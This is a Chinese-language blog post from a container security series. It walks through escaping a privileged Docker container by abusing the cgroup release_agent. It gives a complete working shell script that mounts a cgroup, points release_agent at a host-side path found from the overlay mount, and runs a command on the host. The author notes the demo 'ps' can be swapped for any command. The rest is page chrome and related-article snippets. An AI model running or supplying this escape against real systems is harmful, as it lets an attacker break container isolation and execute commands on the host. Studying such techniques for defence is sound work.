Kubernetes攻防 | 容器逃逸 - 创建cgroup

已于 2023-03-15 09:33:46 修改
阅读量567 收藏 2
点赞数 1
分类专栏: Kubernetes Docker 文章标签: kubernetes 容器 云原生 服务器 docker Powered by 金山文档
于 2023-03-15 09:33:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/trollz/article/details/129544958
版权

容器逃逸默认你懂。从上一篇就可以看出 privileged 容器的强大特权,可以直接对根目录进行挂载来控制宿主机。本篇主要讲利用 cgroup 进行容器逃逸,以在宿主机执行命令。

话不多说,先跑一个特权容器:

docker run -it --privileged ubuntu bash

shell脚本如下,参考地址为:

https://github.com/neargle/cloud_native_security_test_case/blob/master/privileged/1-host-ps.sh 
release_agent.sh
#!/bin/bash
set -uex

mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps -aux > $host_path/output" >> /cmd
chmod +x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

sleep 2
cat "/output"

运行效果:

其中

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

这种做法经常在不同的 Docker 容器逃逸 EXP 被使用到。其思路在于利用 Docker 容器镜像分层的文件存储结构 (Union FS联合文件系统),从 mount 信息中找出宿主机内对应当前容器内部文件结构的路径;则对该路径下的文件操作等同于对容器根目录的文件操作。

宿主机内目录:

当然,在上述脚本中仅仅只是运行了一个 ps 命令,至于你需要运行什么...

不会调制解调的猫
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
node-cgroup-metrics:NodeJs模块,用于从容器内部读取cgroup指标
05-17
CGROUP-METRICS 用于读取指标的节点模块。 从/sys/fs/cgroup/读取。 内存指标: 从路径/sys/fs/cgroup/memory/memory读取: 原始值: stat.rss :匿名和交换高速缓存内存的字节数 kmem.usage_in_bytes :当前内核内存分配 limit_in_bytes :内存使用限制 计算值: containerUsage() : stats.rss + kmem.usage_in_bytes containerUsagePercentage() : stats.rss + kmem.usage_in_bytes / limit_in_bytes CPU指标: 原始CPU值: 从路径/sys/fs/cgroup/读取: cpuacct.usage :自此cgroup获得的容器开始以来的总CPU时间(以纳秒为单位)(
沙箱逃逸技术总结.ppt
07-25
无论是哪种沙箱技术,总归无法和真实环境比拟,所以沙箱逃避技术在高级别病毒样本已经普遍存在,并且逃避技术也在逐渐更新。 下面总结下当前的逃避技术,我分为两个特点进行分析。 ·针对虚拟机检测 ·针对沙箱分析环境特点的对抗
Linux运维-运维课程MP4频-05容器-08Cgroup限制进程对memory使用案例.mp4
05-31
Linux运维-运维课程MP4频-05容器-08Cgroup限制进程对memory使用案例.mp4
linux中cgroup的简单使用
Java+GO+JS全栈工程师-鹤冲天的博客:编程辅导~商务合作~技术交流
07-21 2823
Linux CGroup全称Linux Control Group, 是Linux内核的一个功能,用来限制,控制与分离一个进程组群的资源(如CPU、内存、磁盘输入输出等)。这个项目最早是由Google的工程师在2006年发起(主要是Paul Menage和Rohit Seth),最早的名称为进程容器(process containers)。在2007年时,因为在Linux内核中,容器(container)这个名词太过广泛,为避免混乱,被重命名为cgroup,并且被合并到2.6.24版的内核中去。
从零开始写 Docker(三)---基于 cgroups 实现资源限制
探索云原生
03-01 771
本文为从零开始写 Docker 系列第三篇,在`mydocker run` 基础上基于 cgroups 实现容器的资源限制。
特权容器逃逸
SHELLCODE_8BIT的博客
12-09 560
当我们容器以--privileged启动时,会以特权模式启用,本质上是我们权限扩大了,扩展了我们攻击面,那么特权模式扩展了哪些攻击面呢?
RunC容器逃逸漏洞席卷业界,网易云如何做到实力修复?
weixin_34216107的博客
02-19 126
近日,业界爆出的runC容器越权逃逸漏洞CVE-2019-5736,席卷了整个基于runC的容器云领域,大量云计算厂商和采用容器云的企业受到影响。网易云方面透露,经过技术团队的紧急应对,网易云上的容器服务已经被成功修复,网易云公有云客户在无感知、且不需要增加运维成本的情况下升级到安全的容器云环境,没有任何客户受到该漏洞的影响。 RunC由...
Kubernetes攻防 | 容器逃逸 - Docker in Docker
Trollz的博客
03-15 445
Kubernetes attack and defense | container escape - Docker in Docker
Docker容器逃逸
weixin_44720441的博客
08-23 1033
Docker容器逃逸指的是攻击者通过劫持容器化业务逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力;攻击者利用这种命令执行能力,借助一些手段进而获得该容器所在的直接宿主机(当遇到“物理机运行虚拟机,虚拟机再运行容器”的场景时,该场景下的直接宿主机指容器外层的虚拟机)上某种权限下的命令执行能力。
浅谈容器逃逸
key_3_feng的博客
05-17 2649
cgroup-linux内存资源管理.pdf
07-11
cgroup-linux内存资源管理.pdf cgroup-linux内存资源管理.pdf cgroup-linux内存资源管理.pdf cgroup-linux内存资源管理.pdf cgroup-linux内存资源管理.pdf cgroup-linux内存资源管理.pdf cgroup-linux内存资源管理....
Performance - cgroup介绍
10-10
Performance - cgroup介绍
Docker-Cgroup-Doc
07-09
创建容器后,会创建一个虚拟网络接口: vethfaeed83 Link encap:Ethernet HWaddr 46:dc:df:35:a4:18 adr inet6: fe80::44dc:dfff:fe35:a418/64 Scope:Lien UP BROADCAST RUNNING MTU:1500 Metric:1 Packets re...
Docker基本操作之创建Cgroups
m0_43405302的博客
11-23 1099
一、Docker Docker作为一个开源的镜像,我们可以很简单的在GitHub上下载到docker的镜像文件,但是对于刚接触到Docker的人来说,我们很难知道Docker源码文件及其包括的内容。下面我将详细介绍Docker源码的文件结构。 二、文件介绍 ...
Docker基础-cgroup
可乐不解渴
09-13 932
cgroups(Control Groups) 是 linux 内核提供的一种机制,这种机制可以根据需求把一 系列系统任务及其子任务整合(或分隔)到按资源划分等级的不同组内,从而为系统资源管理提供一个统一的框架。简单说, cgroups 可以限制、记录任务组所使用的物理资源。本质上来说, cgroups 是内核附加在程序上的一系列钩子(hook),通过程序运行时对资源的调度触发相应的钩子以达到资源追踪和限制的目的。
docker安全(cgroups)
qq_42311209的博客
06-06 256
Docker容器的安全性,很大程度上依赖于Linux系统自身,评估Docker的安全性时,主要考虑以下几个方面: Linux内核的命名空间机制提供的容器隔离安全 Linux控制组机制对容器资源的控制能力安全。 Linux内核的能力机制所带来的操作权限安全 Docker程序(特别是服务端)本身的抗攻击性。 其他安全增强机制对容器安全性的影响。 命名空间隔离的安全 当docker run启动一个...
云安全攻防(七)之 容器逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-08 1623
以其他虚拟化技术类似,逃逸是最为严重的安全风险,直接危害了底层宿主机和整个云计算系统的安全,“容器逃逸”是指攻击者通过劫持容器业务化逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力,攻击者利用这种执行能力,借助一些手段进而获得该容器所在的直接宿主机某种权限下的命令执行能力。到此为止,攻击者已经基本从容器内部逃逸出来了,这里说基本,是因为仅仅挂载了宿主机的根目录,如果用ps命令查看的话,可以看到还是容器内部的进程,因为没有挂载宿主机的 procfs。
相关程序漏洞导致的容器逃逸
maoguan121的博客
10-28 323
CVE-2019-5736 正是这样一个存在于 runC 的容器逃逸漏洞,它由波兰 CTF 战队 Dragon Sector 在 35C3 CTF 赛后基于赛中一道沙盒逃逸题目获得的启发,对 runC 进行漏洞挖掘,成功发现的一个能够 覆盖宿主机 runC 程序的容器逃逸漏洞。在成功触发漏洞后,攻击者可以获得宿主机 上反弹过来的 Shell,实现容器逃逸。“镜像漏洞利用”指的是镜像本身存在漏洞时,依据镜像创建并运行的容器也通常会存在相同漏洞, 攻击者利用镜像中存在的漏洞去攻击容器,往往具有事半功倍的效果。
【二进制部署k8s-1.29.4】一、安装前软件准备及系统初始化
最新发布
weixin_56364253的博客
05-30 647
本章节主要讲解在安装部署k8s-1.29.4环境之前的一些软件、环境调优的准备工作,本篇采用k8s二进制安装的方式进行部署,该环境是根据在用的一个30节点左右的k8s集群部署流程进行文章整理。
mount -t cgroup
06-08
要挂载 cgroup 控制组,需要先创建一个挂载点目录,然后使用 mount 命令进行挂载。例如,要将 CPU 控制组挂载到 /sys/fs/cgroup/cpu 下,可以使用以下命令: ``` mkdir -p /sys/fs/cgroup/cpu mount -t cgroup -o ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不会调制解调的猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值